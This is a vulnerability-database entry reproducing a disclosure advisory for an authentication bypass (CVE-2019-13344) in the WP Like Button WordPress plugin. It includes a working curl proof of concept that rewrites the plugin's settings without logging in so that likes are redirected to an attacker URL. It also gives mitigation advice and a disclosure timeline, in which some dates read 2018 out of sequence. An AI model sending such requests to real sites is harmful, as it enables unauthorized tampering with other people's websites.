Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackBenjamin LimEXPLOITPACK:80E1CB1E07C390877BE1DAEC7DD6A89A
HistoryJul 08, 2019 - 12:00 a.m.

WordPress Plugin Like Button 1.6.0 - Authentication Bypass

2019-07-0800:00:00
Benjamin Lim
13

0.945 High

EPSS

Percentile

99.2%

JSON

WordPress Plugin Like Button 1.6.0 - Authentication Bypass

Exploit Title: WP Like Button 1.6.0 - Auth Bypass
Date: 05-Jul-19
Exploit Author: Benjamin Lim
Vendor Homepage: http://www.crudlab.com
Software Link: https://wordpress.org/plugins/wp-like-button/
Version: 1.6.0
CVE : CVE-2019-13344

1. Product & Service Introduction:
WP Like button allows you to add Facebook like button on your wordpress
blog. You can also add Share button along with Like button or can add
recommend button. As of now, the plugin has been downloaded 129,089 times
and has 10,000+ active installs.

2. Technical Details & Description:
Authentication Bypass vulnerability in the WP Like Button (Free) plugin
version 1.6.0 allows unauthenticated attackers to change the settings of
the plugin. The contains() function in wp_like_button.php did not check if
the current request is made by an authorized user, thus allowing any
unauthenticated user to successfully update the settings of the plugin.

3. Proof of Concept (PoC):
For example, the curl command below allows an attacker to change the
each_page_url parameter to https://hijack.com. This allows the attacker to
hijack Facebook likes.

curl -k -i --raw -X POST -d
"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
-H "Content-Type: application/x-www-form-urlencoded"

4. Mitigation
No update has been released by the vendor. Users are advised to switch to a
different plugin.

5. Disclosure Timeline
2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 ([email protected])
2019/06/30 Second email sent to vendor ([email protected])
2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
Vendor did not acknowledge any emails.
2018/07/03 Third email sent to vendor's billing email domain ([email protected])
2018/07/05 Public disclosure

6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]

Related

prion 1
cvelist 1
cve 1
zdt 1
patchstack 1
packetstorm 1
wpvulndb 1
nvd 1
checkpoint_advisories 1
exploitdb 1
prion
prion
Authentication flaw
2019-07-05 16:15:00
cvelist
cvelist
CVE-2019-13344
2019-07-05 15:33:45
cve
cve
CVE-2019-13344
2019-07-05 16:15:11
zdt
zdt
WordPress Like Button 1.6.0 Plugin - Authentication Bypass Vulnerability
2019-07-08 00:00:00
patchstack
patchstack
WordPress WP Like Button plugin <= 1.6.0 - Auth Bypass vulnerability
2019-07-10 00:00:00
packetstorm
packetstorm
WordPress Like Button 1.6.0 Authentication Bypass
2019-07-08 00:00:00
wpvulndb
wpvulndb
WP Like Button <= 1.6.0 - Auth Bypass
2019-07-05 00:00:00
nvd
nvd
CVE-2019-13344
2019-07-05 16:15:11
checkpoint_advisories
checkpoint_advisories
Wordpress Like Button Plugin Authentication Bypass (CVE-2019-13344)
2022-11-14 00:00:00
exploitdb
exploitdb
WordPress Plugin Like Button 1.6.0 - Authentication Bypass
2019-07-08 00:00:00

0.945 High

EPSS

Percentile

99.2%

JSON
Related for EXPLOITPACK:80E1CB1E07C390877BE1DAEC7DD6A89A
prion1cvelist1cve1zdt1patchstack1packetstorm1wpvulndb1nvd1checkpoint_advisories1exploitdb1